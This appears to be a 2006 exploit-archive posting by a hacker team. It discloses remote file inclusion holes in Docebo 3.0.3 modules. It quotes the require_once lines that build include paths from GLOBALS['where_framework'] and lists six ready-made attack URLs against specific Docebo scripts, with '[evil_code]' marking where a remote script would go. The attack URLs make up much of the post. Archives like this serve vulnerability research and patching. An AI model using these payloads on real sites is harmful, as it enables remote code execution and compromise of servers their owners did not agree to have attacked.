[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Docebo <= 3.0.3 Multiple Remote File Include Vulnerabilities
# Published : 2006-05-23
# Author : Kacper
# Previous Title : Nucleus CMS <= 3.22 (DIR_LIBS) Arbitrary Remote Inclusion Exploit
# Next Title : phpCommunityCalendar <= 4.0.3 Multiple (XSS/SQL) Vulnerabilities
################ DEVIL TEAM THE BEST POLISH TEAM #################
#Docebo 3.0.3/DoceboCMS,DoceboKms,DoceboLms,DoceboCore,DoceboScs - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
####################################################################
#Docebo Site: http://www.docebocms.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In All scripts:
[code]
require_once($GLOBALS['where_framework'].'/lib/lib.permission.php');
require_once($GLOBALS['where_framework'].'/lib/lib.pagewriter.php');
require_once($GLOBALS['where_framework'].'/lib/lib.lang.php');
require_once($GLOBALS['where_framework'].'/lib/lib.template.php');
require_once($GLOBALS['where_framework'].'/lib/lib.mimetype.php');
[/code]
#DoceboCMS:
http://www.site.com/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code]
#DoceboKms:
http://www.site.com/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code]
http://www.site.com/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code]
#DoceboLms:
http://www.site.com/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code]
#DoceboCore:
http://www.site.com/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code]
#DoceboScs:
http://www.site.com/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#The End ;-)
#Pozdro Dla wszystkich o kt¨®rych zapomnia.em ;-)
# www.Syue.com [2006-05-23]